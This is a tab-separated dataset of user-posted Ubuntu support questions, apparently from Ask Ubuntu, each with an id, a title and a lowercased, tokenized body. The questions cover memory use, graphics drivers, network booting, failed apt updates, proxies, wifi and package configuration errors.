272393	server slowly runs out of memory	my ubuntu 10.04 server slowly eats up memory . if you look at tops , it slowly starts using swap space . eventually the amount of free memory drops too low and the kernel kills the worst process . a top on the server sorted by res looks like this : top - 20:39:41 up 30 days , 5:43 , 1 user , load average : 0.00 , 0.01 , 0.05 tasks : 114 total , 1 running , 113 sleeping , 0 stopped , 0 zombie cpu ( s ) : 0.0 % us , 0.0 % sy , 0.0 % ni,100.0 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 509424k total , 495236k used , 14188k free , 37876k buffers swap : 262140k total , 159184k used , 102956k free , 131312k cached pid user pr ni virt res shr s % cpu % mem time+ command 12210 amavis 20 0 68804 43m 3616 s 0 8.8 0:05.30 amavisd-new 12313 amavis 20 0 67480 40m 3252 s 0 8.2 0:03.54 amavisd-new 2321 root 20 0 46572 24m 948 s 0 4.9 0:04.26 saslauthd 2323 root 20 0 44988 24m 936 s 0 4.8 0:04.10 saslauthd 2322 root 20 0 46440 23m 932 s 0 4.8 0:04.30 saslauthd 2324 root 20 0 45780 23m 924 s 0 4.6 0:04.21 saslauthd 2325 root 20 0 42880 22m 1016 s 0 4.5 0:03.91 saslauthd 1991 mysql 20 0 138m 18m 2804 s 0 3.8 10:57.95 mysqld 2201 amavis 20 0 64916 14m 2556 s 0 2.9 0:35.98 amavisd-new 18225 root 20 0 37644 9164 5052 s 0 1.8 0:27.51 apache2 29781 www-data 20 0 38772 8272 3216 s 0 1.6 0:00.22 apache2 ... my question is , how can i see what process is responsible for eating up memory ? the largest program , mysql , seems pretty ok with just 138m taken .
272396	how to run full ubuntu installation from external hard drive ?	please bare with me : so i 'd like to re-purpose my previous laptop as a desktop ( seeing as it has decent specs ) , the problem is is that the hard drive is shot ( failing ) so installing ubuntu on to that hard drive causes serious lag and overall crappy performance . my question : do you know of a way to install and run ubuntu 12.10 ( preferred ) from an external hard-drive ? i 'd like for my 500gb ( external ) to be the primary drive . any help would be most appreciated , thanks !
272398	how do i write articles without infringing on oss project 's logos and brands ?	i am sorry if this is not the place where to ask and if so , i would appreciate any of the moderators move this question to the right place in order to get the proper answer . i am the webmaster and it consultant for several local media , radio and tv stations and newspapers at my place in mexico . let 's mention the tv channel 9 ( http : //www.canal9tampico.com ) , diario debate ( http : //www.diariodebate.info ) , el universo tamaulipeco noticias ( http : //eluniversotamaulipeco.com ) some of them have invited me to write a coverage or editorial column about technology and i am very interested on writing about ubuntu and open source software such as the gimp , inkscape , libreoffice , etc . the coverage will -of course- include my personal achievements and experiences based on the day-to-day usage of these software , among other software and/or online services . i would like to know if it is legal or at least i wo n't break any rules by to mention the brand names , use logos to illustrate or including screenshots , video tutorials or something in the writing . i will appreciate a lot your feedback . thanks in advance .
272406	what driver should i install to use unity with a radeon hd 7750 ?	ubuntu 12.10 i followed some tutorial ( which i can not find again ) on how to install amd catalyst . it involved updating the kernel or something . this works as i am now no longer using software rendering but now i have very poor performance in any 3d game i play . what could be causing it ? now if i install fglrx , unity will not start up no matter what . is there any way i can install a good driver that works without crashing unity ? specs : amd fx-6200 8gb ddr3 ram radeon hd 7750
272407	how to make an avermedia avertv volar green hd work ?	how can i get a driver to make my avermedia avertv volar green hd work ? see below the solution for ubuntu 12.04 see below the solution for ubuntu 13.10 and 14.04 ( the simpler solution ) see below how to check that it has been well installed
272411	what is apt and what are its uses ?	in a terminal , if you type apt- and press tab , you will end up with these suggestions : i 'd like to see practical examples of how you would use each these commands . note : i already know how to use a few of these , but would like examples of them all for completeness .
272413	show folder in list by default	ubuntu 12.04 shows folder as icon by default , see image below how can i make folder displayed in list by default , as shown in the image below
272419	kill a cron job from cron	i want to start the ubuntu update at night because internet is free at that time . and then kill the process in order to ensure that it does not download anything after 7:00 am . is there any way to know the process id of the cron job in order to kill it before the process run ? or any other way ?
272424	black screen after suspend - toshiba nb515-sp020ll , gma3600 graphics , ubuntu 12.04	hi i 'm trying to troubleshoot this and am following these instructions to help me out . i 'm getting a black screen after suspend and am using a toshiba nb515-sp020ll with a gma3600 graphics card . it has the latest bios . i am running 12.04 the graphics card is n't supported yet so i 'm sure the problem is related to that . i do n't mind since this is a netbook and high performance is not a priority . it 'd just be nice to suspend the computer . : ) any suggestions ? cat /proc/acpi/wakeup > wakeup device s-state status sysfs node elan s4 *disabled usb0 s3 *enabled pci:0000:00:1d.0 usb1 s3 *enabled pci:0000:00:1d.1 usb2 s3 *enabled pci:0000:00:1d.2 usb3 s3 *enabled pci:0000:00:1d.3 usb7 s3 *enabled pci:0000:00:1d.7 rp01 s4 *disabled pci:0000:00:1c.0 pxsx s4 *enabled pci:0000:01:00.0 rp02 s4 *disabled pci:0000:00:1c.1 pxsx s4 *disabled pci:0000:02:00.0 rp03 s4 *disabled pxsx s4 *disabled rp04 s4 *disabled pxsx s4 *disabled lid0 s4 *enabled
272425	how do i boot ubuntu from the network ?	is there an easy way to boot ubuntu from network a.k.a . pxe ? i would like to setup a pxe server , connect an old laptop ( without cdrom nor working usb-boot-option ) to the network and boot ubuntu through the network . i found this howto but that seems a bit much for just that little installation . or the manpage is somewhat overwhelming . what is the easiest way to achieve this ?
272426	how to reduce high gpu temperature in ubuntu 12.04/12.10/13.04	i 've been having this problem since maybe 4 , 5 months ago . i 've search in the forums and tried every given solution . please help . i have an asus g73jh with an ati mobility radeon hd5870 graphic card . the gpu idle temperature is around 95째c , but after some time of use it rises over 100째c after some time of use ( even using a fan base ) . it rises quicker when watching videos , achieving even 110째c . i 've tried : fresh install of ubuntu 12.04 , 12.10 , even 13.04 using default drivers , or property drivers ( both fgrlx and fglrx-updates ) ( catalyst 9.00 , 9.01 , 12.100 ) using every kernel since 3.5 to 3.8 downgrading xorg xserver from 1.13. to 1.12 using the jupiter power manager applet modifying the grub ( modifying this line : grub_cmdline_linux_default= '' quiet splash `` for this one grub_cmdline_linux_default= '' quiet splash i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 i915.lvds_downclock=1 pcie_aspm=force '' ) however , for sure i 'm missing something . my father has the same machine working with temperatures around 82째c . he did change too many things that he does n't remember which made it work . does someone has the same machine or at least the same graphic card working perfectly ?
272429	ctrl+space does n't work in eclipse	i checked the keys in eclipse , shortcuts in settings , autokey does n't seem to interfere , i 'm not sure where else to look for . how can i trace and fix ctrl+space for eclipse ?
272432	restrict file search to one folder and it 's subs	when i go to settings > privacy > files ( tab ) it provides me with the option to provide a list of folders : '' do n't record activity in the following folders '' however , i 'd like to be able to do the opposite : '' record activity only in the following folders '' is this possible ?
272440	using linux/ubuntu to combat windows flash drive malware ?	i had asked this question on itsecurity @ stack exchange also . there may not be may linux distro users in itsec , but obviously there are many here . so , i think that it might be appropriate to put that question here also . please tell me if you disagree . original question at - http : //security.stackexchange.com/questions/33017/using-linux-to-combat-windows-flash-drive-malware question is - i just put an old flash drive which i used with a windows machine into my linux . i noticed many files , mostly exes which were never visible in windows ( my windows does not hide hidden files and extensions ) . most of those strange files had malware like names . i changed the properties of these files so that linux would allow me to delete them . it worked and now the drive seems to be fully clean . if a windows malware in a flash drive can hide itself from windows , can it also hide itself from linux ? if not , then cleaning windows malware on a flash drive becomes easy . are there any dangers/problems in this strategy ?
272442	windows installer does not boot on windows xp	i have installed windows installer wubi.exe but does not boot , how to dual-boot ? how to initialize ubuntu , i did it on windows xp
272446	pygtk textbuffer adding tags and reading text	as in topic i have textview ( ) and textbuffer ( ) added to it , i also have tags created so when i select text and click button it will make text bold or something . up to this point all works well , now i need to be able to go through all text in textview and find what tag is applied and where , i need this so i can format text by adding stuff before and after tagged text . here is part of the code : self.textview = gtk.textview ( ) self.buffer = self.textview.get_buffer ( ) self.scrolledwindow.add ( self.textview ) self.textview.show ( ) self.tag_bold = self.buffer.create_tag ( `` bold '' , weight=pango.weight.bold ) it would be best if i could get output like , `` test text '' is `` bold '' . thanks for any help .
272448	how can i install ubuntu on my macbook pro without efi interference ?	i have a late 2011 macbook pro , that i bought in early 2012 . is it possible to cleanly install ubuntu without the irritating efi mac 'shell ' surrounding the install , making the mac boot sound and generally slowing boot up time by 15-25 seconds ?
272450	debian package creation- how to define environment variables within the package	i built a package with the sudo-ldap package defined as a dependency in the control file ( please see below ) . i 'm going to have people install using the gdebi command to install which should install the package and any required dependencies . unfortunately , this will require the export sudo_force_remove=yes variables to be set or the sudo-ldap package will not be installed and will error out the entire package install . how do i define an environment variable for the whole package creation . my ultimate goal is to have a user install this package without having to manually define environment variables ... i know i can call this package with a script , but i 'd rather not do that . depends : $ { misc : depends } ldap-utils , sudo-ldap thanks so much in advance .
272453	how do i set up a logging server for access points ?	i have a linksys ap , nothing fancy , but it does have a logging utility . how do i make that send the logs my ubuntu 12.04 server .
272461	how to get havp ( http anti virus proxy ) working ?	i have a ubuntu 12.04 server with havp ( http anti virus proxy ) with clamav and avg . my dhcp server is a openbsd 5.2 router . if i connect manually to my ubuntu server its works great , but when i 'm setting the router to forward the http traffic to the ubuntu server its not working . i could see in the tcpdump that the traffic from the router is redirected to the ubuntu server . 01:12:34.562253 ip 192.168.1.14.64642 > 192.168.1.11.http-alt : flags [ r ] , seq 1739163894 , win 0 , length 0 01:12:34.562164 ip 192.168.1.11.http-alt > 192.168.1.14.64642 : flags [ s. ] , seq 3267364044 , ack 1739163894 , win 14600 , options [ mss 1460 , nop , nop , sackok ] , length 0 where 192.168.1.14 is my client pc , and 192.168.1.11 is the ubuntu server . any suggestions for how to get this working ? i want to get the havp server to accept redirected traffic
272467	can not install updates on ubuntu 12.04 lts !	here is what i get when trying to install the update : first i get a window message with all this : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/natty/partner/source/sources 403 forbidden , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/natty/partner/binary-amd64/packages 403 forbidden , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/natty/partner/binary-i386/packages 403 forbidden , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-amd64/packages 403 forbidden , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-i386/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/gnome3/ubuntu/dists/oneiric/main/source/sources 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/gnome3/ubuntu/dists/oneiric/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/gnome3/ubuntu/dists/oneiric/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ubuntu-audio-dev/ppa/ubuntu/dists/precise/main/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ubuntu-audio-dev/ppa/ubuntu/dists/precise/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-amd64/packages 403 forbidden , w : failed to fetch http : //dl.google.com/linux/talkplugin/deb/dists/stable/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //ppa.launchpad.net/ubuntu-audio-dev/ppa/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //dl.google.com/linux/talkplugin/deb/dists/stable/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-amd64/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages 403 forbidden , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages 403 forbidden , e : some index files failed to download . they have been ignored , or old ones used instead .
272468	should i install 12.04 or 12.10 ?	i 've been using 12.04 for a few months now , but today i began thinking about re-installing ubuntu , and now i 'm a bit confused . what should i choose ? ubuntu 12.04 or 12.10 32 bit or 64 bit i want to get maximum output from the resources available on my laptop : core i3 4gb ram 640gb hdd my main priority is speed ! using an lts is n't too important , as i usually change my os every few months .
272470	kubuntu 12.04 screen capture ( ksnapshot , etc . ) broken by update	i 'm running kubuntu 12.04 with an amd/ati graphics card ( and multiple monitors ) . after a system update about a month or two ago ksnapshot stopped working for me . all it does is capture the stock kde desktop background ( even though that is n't what i see on the screen ) . i can not actually capture any application windows or any type of useful content . the screen capture feature of gimp exhibits the same error . the appearance of this error coincides with a kubuntu system update ( approx a month or so ago ) that changed the lockscreen behavior . it appears to be a security related change . i do n't know the details ( or even where to find the details ) of the update . but the first update was buggy and it was follow closely by another one . both affected the lockscreen . the first update broke ksnapshot -- and monitor power management when the desktop is locked . the follow up fixed the monitor power management issue , but it did not fix the ability to capture a screen shot . the end result for me appears to be a more secure lock screen but broken ksnapshot . i have been waiting patiently , but i think now is the time to be proactive after waiting more than a month . i am trying to learn anything related to this issue . google has not helped .
272475	how to eliminate or disable the gnome3 top panel ?	i am using gnome3 with ubuntu 12.10 . i am interested in using the new cairo dock which seems to replace the gnome top panel . the trouble here is that the top panel overlaps the new cairo upper docks . how do i disable the gnome shell top panel ? i tried adding display : none to /usr/share/gnome-shell/theme/gnome-shell.css , but this accomplishes nothing .
272477	what are bionic and libhybris ?	in reading about ubuntu touch and ubuntu for android , i have noticed references to `` bionic '' and `` libhybris '' that are made fairly often . i assume that libhybris is a library because of the `` lib '' prefix , but that 's about all i know . what are bionic and libhybris , and what do they do ? edit : @ maggotbrain asked if i could link to some of the sources where i found mention of bionic/libhybris . here is a comment on hacker news , and here is another . those are the only ones that i could find , what really got me wondering was when someone mentioned it at an ubuntu loco meeting .
272478	how do i install ia32 libs , the multi-arch packages ?	i can not install ia32 libs no matter how hard i try . here is the error i get : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages . when i try to install ia32-libs-multiarch i get : reading package lists ... done building dependency tree reading state information ... done package ia32-libs-multiarch is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs-multiarch ' has no installation candidate i 've tried many things suggested on forums . is this not fixable or is there a certain fix i may not have already tried ?
272485	avconv -g parameter description	this is the official description of parameter : ‘-g [ : stream_specifier ] integer ( output , video ) ’ set the group of picture ( gop ) size not very informative i 'd say . can anyone explain what does it actually do and what is the optimal value ? and on what depends moov atom size ?
272486	setup media server on ubuntu vps	i have get a vps running ubuntu 12.04 . i want to setup a media server on the vps , as i plan to use the vps to download videos , and streaming the video through internet . i wonder what should i do to achieve this goal ? i have tried the following but not successful so far : setup airvideo-server and vpn on the vps , then connect to the vpn and use airvideo client to watch the video , but do n't know why , the file just do n't streaming , though it can get the correct information of the video . setup minidlna and vpn on the vps , then connect to the vpn and use airplayer , but failed to find the server/content .
272491	why is setting alias in .profile not working ?	i have this as the last line in my .profile : alias gl= '' cd /home/jrenner/glances/glances '' yet even after reboot i get command not found when typing gl . what is happening ? i am logged in as the correct user .
272494	how to fix black screen of ubuntu after i on my laptop ?	i am using compaq pressario cq40 . while i was trying to fix the problem of touchpad , i opened up /etc/x11/xorg.conf and typed the commands : section `` inputclass '' identifier `` etps/2 elantech touchpad '' matchproduct `` etps/2 elantech touchpad '' matchdevicepath `` /dev/input/event* '' driver `` synaptics '' option `` areatopedge '' `` 50 '' after that i rebooted it , but ubuntu stopped working . it just shows me a black screen . neither i can reinstall or nor can i login to my previous one .
272496	extremely slow internet speeds and wifi adpadter isnt detected when i use lspci	basically the title . i just downloaded linux . and my internet speeds are terribly slow . i 'm using an hp pavilion 2000-365dx . i 'm pretty sure its a broadcom card . but i 'm really not sure and not incredibly techy , i would apperciate it if someone could help me . i just got ubuntu . thanks in advance lspci -nn 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 07:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) i 've got a screen shot for the other one also , now i 'm connected to the internet but it says the connection speed is 6 mbp/s and on windows i got 54 . how to fix this ?
272499	2nd hd added to laptop . eating battery life	i replaced my main laptop hard drive with a 240gb ssd . ordered one of the faux optical drives that allow you store a second hard drive where your cd-rom use to be . i 'm able to access both drives successfully , my only problem - the battery life is literally about a 1/2 or a 1/3 of what it use to be before this new hard drive arrangement . i 'd read forum posts about the old ubuntu bug where it can continuously cycle your drives . i am not accessing this drive . not reading or indexing the data on it . it is my windows 7 ntfs drive that came with the system . i was going to format it and use it as additional storage but now i 'm debating just putting my optical drive back in . i could understand if the battery life diminished slightly but if i 'm not actually moving or using the drive at all . why does it affect life so much ? is there a way to correct it or possibly leave it completely unmounted unless otherwise needed ? thank you in advance .
272502	proxy issues with im clients using yahoo	i 've tried a number of clients now including kopete , pidgin and empathy but none of them seem to respect my proxy settings . for example in pidgin after adding a yahoo account then setting : proxy type : http host : 127.0.0.1 port : 8080 ( i 'm going to be going through privoxy ) in the proxy tab then clicking use account proxy for http and https connections in the advanced tab . all i get is unable to connect : server closed the connection from pidgin . everything works fine if i flush iptables of course , but i obviously do n't want to do that . how can i get at least one of these clients to work with yahoo im and through a proxy ( local privoxy ) ? edit : i discovered it was actually dansguardian that was killing pidgin since the blanket block ssl and blanket block ip address only were on and it seems pidgin connect via some address like https : //66.196.120.xx:5050 each time . edit 2 : this allowance in dansguardian also fixes the problems with telepathy too and it also now connects and seems to respect the system/environmental proxy settings . just kopete then that is broken..
272503	ubuntu 12.04 boots into black blank screen	i installed ubuntu server 12.04 about 2 weeks ago . it had been working well and running 24/7 until i accidentally restarted it yesterday . should n't have been a problem , yet now it just sits at a black screen . it 's not a screen-has-no-signal black screen , it looks like it 's actually displaying black all around . some facts : it does n't seem to be connecting to the network . the keyboard numlock key works . ctrl+alt+del key combination works . the screen is working correctly . i can see the bios screens and i can boot into a live usb drive . i recall rebooting the system a few times after i installed it and it was working fine , aside for the fact that the screen would remain at the ubuntu logo , so i would have to alt+f2 into another terminal to log in . everything else was fine . system : p8h77-i motherboard ( using on-board video ) 2x ssd drives in raid 1 ( using mdadm ) using grub the last thing i did before rebooting it was run apt-get update then apt-get upgrade but i do n't remember seeing any kernel-related packages in the list . i 've booted from a `` live '' usb drive i made in order to install ubuntu , however , i remember having a whole lot of trouble as i had to mount the cd image manually in order to install . i might have to get a real dvd drive and boot off that , but i do n't have any optical media : | please let me know if you need any more info to help me troubleshoot . thanks in advance ! what have i tried ? i have tried holding f6 to get into grub i have tried booting off a live drive . i believe i have to set `` nomodeset '' or something , but i do n't know how to do that off a live cd on a raided system . plus , this would n't explain why i was able to reboot before but not now . i am aware of similar questions , but this is different because it 's not happening right after install.. it rebooted a few times after install , ran for awhile , then this .
272505	ubuntu server 12.10 dhcp configuration	when installing ubuntu server12.10 i am not connected to internet and while installing i chose manually configure network . now i need my server to be connected to internet . please help me ... .. thanks in advance .
272512	how to trace the ip of a hacker who always steals the mac address of my computer ?	i am using the edu net in my university . however it often occures that someone always steal the mac adress of my computer to cheat the server so that he can use the network service without paying for it . most of the time his ip address was disguised as 0.0.0.0 . the problem is how i can trace his real ip adress and find him and let him pay the price ? ! thanks a lot !
272522	ubuntu 12.10 not reading wifi connections on macbook pro	i installed ubuntu onto my mac ( not dual-boot ) so mountain lion is gone . everything is working except for one thing , the wifi . i tried all of the commands suggested but they do n't work . i added the connections to edit connections , but they still do n't pop up .
272535	bash script that convert any output ( text ) to json form	i want to create bash script that it converts output of other scripts ( normally simple text ) in a valid json form . how can i do this ? example : awk '/^mem/ { printf ( `` % u % % '' , 100* $ 3/ $ 2 ) ; } ' < ( free -m ) command give me used memory . i want to get output in valid jason form . desired output : { “memory” : ”80” }
272537	upgrade has a problem	when i use : sudo dpkg -- configure -a i get this : setting up rsyslog ( 5.8.6-1ubuntu9.1 ) ... dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : rsyslog then i type : sudo apt-get -f install answer is : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : calligra-l10n-engb cdparanoia k3b k3b-data k3b-i18n kde-l10n-engb kde-l10n-fa kde-l10n-zhcn kdevelop-l10n kdevelop-php-docs-l10n kdevelop-php-l10n language-pack-kde-en language-pack-kde-fa libflac++6 libk3b6 libkcddb4 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up rsyslog ( 5.8.6-1ubuntu9.1 ) ... dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 10 no apport report written because maxreports is reached already errors were encountered while processing : rsyslog e : sub-process /usr/bin/dpkg returned an error code ( 1 ) at the end : i use : sudo sh -x /var/lib/dpkg/info/rsyslog.postinst configure and answer is : set -e user_conf=/etc/rsyslog.d/50-default.conf default_conf=/usr/share/rsyslog/50-default.conf ucf -- three-way -- debconf-ok /usr/share/rsyslog/50-default.conf /etc/rsyslog.d/50-default.conf then i do this : sudo ucf -- verbose -- debug=2 -- three-way -- debconf-ok / { usr/share/rsyslog , etc/rsyslog.d } /50-default.conf and get : ucf : the debug value is 2 ucf : the new file is /usr/share/rsyslog/50-default.conf ucf : the destination file is /etc/rsyslog.d/50-default.conf ucf : the source directory is /usr/share/rsyslog ucf : the state directory is /var/lib/ucf the hash file exists egrep [ [ : space : ] ] /etc/rsyslog.d/50-default.conf $ /var/lib/ucf/hashfile 80de10a8b9f13365de8cc4bbf8efec5e /etc/rsyslog.d/50-default.conf the new start file is `/usr/share/rsyslog/50-default.conf\' the destination is /etc/rsyslog.d/50-default.conf\ ' ( /etc/rsyslog.d/50 -default.conf\ ' ) the history is kept under \'/usr/share/rsyslog\' the file may be cached at \'/var/lib/ucf/cache/ : etc : rsyslog.d:50-default.conf\' the destination file exists , and has md5sum : 80de10a8b9f13365de8cc4bbf8efec5e /etc/rsyslog.d/50-default.conf the old md5sum exists , and is : 80de10a8b9f13365de8cc4bbf8efec5e the new file exists , and has md5sum : 80de10a8b9f13365de8cc4bbf8efec5e /usr/share/rsyslog/50-default.conf historical md5sums are not available ucf : the debug value is 2 ucf : the new file is /usr/share/rsyslog/50-default.conf ucf : the destination file is /etc/rsyslog.d/50-default.conf ucf : the source directory is /usr/share/rsyslog ucf : the state directory is /var/lib/ucf the hash file exists then i type : sudo apt-get upgrade -f and get this : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? setting up rsyslog ( 5.8.6-1ubuntu9.1 ) ... dpkg : error processing rsyslog ( -- configure ) : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : rsyslog e : sub-process /usr/bin/dpkg returned an error code ( 1 )
